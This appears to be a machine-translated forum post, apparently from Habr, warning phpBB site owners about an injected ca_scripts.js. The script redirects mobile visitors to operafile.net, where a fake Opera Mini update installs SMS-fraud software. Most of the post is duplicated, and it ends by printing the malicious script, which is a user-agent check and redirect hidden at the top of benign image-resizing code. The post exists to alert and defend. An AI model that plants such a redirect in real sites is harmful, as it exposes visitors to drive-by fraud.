Opera Mini update - even if it is not installed
Hello!
Does your mobile friend ask you to update Opera? Do not believe it is a lie! Be careful!
Just stumbled upon a vulnerability in phpbb. Where it lies I do not know - but that's what it is. Using this vulnerability, the ca_scripts.js script is being poured or created in the engine of your forum, I suspect that it can be called anything. Just below, I'll post it.
Its essence is that when a user visits your website, the script determines the operating system using the navigator.userAgent.match function. If your operating system fits the following list:
then he redirects to operafile.net and appends / u / [ID] (apparently the guys keep statistics). Next, an offer to update Opera Mini will be formed, even if it is not installed . After you download an update that is very similar to Opera's installer, you install software that will send SMS to short numbers in the background, but not for you to win Mercedes, but just to empty your account.
If you go to operafile.net , you will be redirected to google.com.
For web masters. If you have read this post, I advise you to find all scripts that contain the domain operafile.net and others (you don’t know what =) what you don’t know the domains of in your public “tug”. Or analyze by date.
Here is the script itself
')
Does your mobile friend ask you to update Opera? Do not believe it is a lie! Be careful!
Just stumbled upon a vulnerability in phpbb. Where it lies I do not know - but that's what it is. Using this vulnerability, the ca_scripts.js script is being poured or created in the engine of your forum, I suspect that it can be called anything. Just below, I'll post it.
Its essence is that when a user visits your website, the script determines the operating system using the navigator.userAgent.match function. If your operating system fits the following list:
- android
- midp
- j2me
- symbian
- series 60
- symbos
- windows mobile
- windows ce
- ppc
- smartphone
- blackberry
- mtk
then he redirects to operafile.net and appends / u / [ID] (apparently the guys keep statistics). Next, an offer to update Opera Mini will be formed, even if it is not installed . After you download an update that is very similar to Opera's installer, you install software that will send SMS to short numbers in the background, but not for you to win Mercedes, but just to empty your account.
If you go to operafile.net , you will be redirected to google.com.
For web masters. If you have read this post, I advise you to find all scripts that contain the domain operafile.net and others (you don’t know what =) what you don’t know the domains of in your public “tug”. Or analyze by date.
Here is the script itself
')
var ca_item;
var ca_item2;
var ca_list;
if (navigator.userAgent.match (/ (android | midp | j2me | symbian | series 60 | symbos | windows mobile | windows ce | ppc | smartphone | blackberry | mtk) / i)! == null) {
window.location = "http://operafile.net/u/1013";
}
onload_functions [onload_functions.length] = 'ca_resize_images ();';
// resize images
function ca_resize_images ()
{
var i, limit, diff;
limit = 600;
diff = 225;
ca_item = document.getElementById ('contentrow');
if (ca_item && ca_item.clientWidth)
{
limit = ca_item.clientWidth - diff;
}
if (limit <500)
{
limit = 500;
}
if (document.body.clientWidth && document.body.clientWidth <(limit + diff) && document.body.clientWidth> 800)
{
limit = document.body.clientWidth - diff;
}
else if (window.innerWidth && window.innerWidth <(limit + diff) && window.innerWidth> 800)
{
limit = window.innerWidth - diff;
}
/ * IE6 limit fix * /
if (! window.XMLHttpRequest && limit> 1500)
{
limit = 800;
}
if (ca_main_width && ca_main_width.indexOf ('%') == -1)
{
ca_main_width.replace (/ px /, '');
if (ca_main_width> 0)
{
limit = ca_main_width - diff;
}
}
if (ca_item)
{
ca_list = ca_item.getElementsByTagName ('img');
}
else
{
ca_list = document.getElementsByTagName ('img');
}
for (i = 0; i <ca_list.length; i ++)
{
ca_item = ca_list [i];
if (ca_item.width> limit)
{
if (document.all)
{
ca_item.style.cursor = 'hand';
}
else
{
ca_item.style.cursor = 'pointer';
}
ca_item.style.width = (limit - 50) + 'px';
ca_item.onclick = function () {
window.open (this.src, 'image', 'width = 700, height = 500, resizable = 1, scrollbars = 1');
}
}
}
}
Source: https://habr.com/ru/post/137578/
All Articles